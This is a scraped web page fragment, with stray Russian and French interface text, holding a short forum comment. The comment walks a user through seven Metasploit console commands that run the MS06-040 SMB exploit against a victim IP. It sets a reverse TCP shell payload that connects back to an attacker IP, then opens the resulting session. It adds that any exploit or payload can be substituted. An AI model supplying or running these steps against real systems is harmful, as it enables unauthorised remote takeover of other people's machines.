Вы находитесь на странице: 1из 1

Corey Nachreiner il y a 4 ans Jarvista, They are basic Metasploit CLI commands.

I'd check out a MFS CLI tutorial for mor e details. Anyway, here are the specifics: 1) sudo msfconsole 2) use windows/smb/ms06_040_netapi <-- you can replace with any exploit 3) set PAYLOAD windows/shell_reverse_tcp <-- you can replace with any payload 4) set? LHOST [attacker ip address] 5) set RHOST [victim ip address] 6) exploit 7) sessions -i 1 <-- replace with right session That's it. Pretty simple.

Вам также может понравиться